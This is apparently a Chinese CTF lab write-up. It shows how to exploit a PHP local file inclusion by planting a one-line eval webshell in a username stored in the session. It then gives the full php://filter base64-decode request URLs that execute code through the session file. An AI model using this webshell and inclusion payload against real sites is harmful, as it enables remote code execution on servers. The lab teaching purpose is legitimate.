文件包含漏洞之包含SESSION(CTF题目)

这次使用的环境是ubuntu+nginx+php+mysql

首先四个文件源码在以下链接中:

一道CTF题:PHP文件包含 | Chybeta

我们注册一个用户名111密码111,然后登录查看cookie和linux的session,因为我们的de服务器

是手动搭建的,所以容易知道session的位置。

我们查看这个session:

复制代码
cd /var/lib/php/sessions

发现我们的用户名以base64编码的格式放在了session中,因此我们只要把含有木马的用户名注册了,这个木马就会以base64编码的格式放在session中,并且路径我们也是知道的。

我们把一句话木马注册,可以看到木马已经被放进数据库里面了,session中也存在

15

复制代码
192.168.87.134/session_upload/index.php?action=php://filter/read=convert.base64-decode/resource=/var/lib/php/sessions/sess_hej7e9k4vjusbpumknkvsks5f1

但是上面的payload不能执行,因为session中还包含着15位的前缀,需要让其乱码

需要重新注册一个base64编码后的名字长度大于100的

复制代码
chybetachybetachybetachybetachybetachybetachybetachybetachybeta<?php eval($_GET['atebyhc']) ?>

重复上述步骤

注册这个用户名:

复制代码
chybetachybetachybetachybetachybetachybetachybetachybetachybeta<?php eval($_GET['atebyhc']) ?>
复制代码
http://192.168.87.134/session_upload/index.php?action=php://filter/read=convert.base64-decode/resource=/var/lib/php/sessions/sess_bhbl2nhonauub8vko76g2ublkt&atebyhc=phpinfo();

成功!

相关推荐
用户9623779544811 小时前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机14 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机14 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户9623779544816 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star16 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户9623779544819 小时前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher2 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行5 天前
网络安全总结
安全·web安全
red1giant_star5 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透6 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全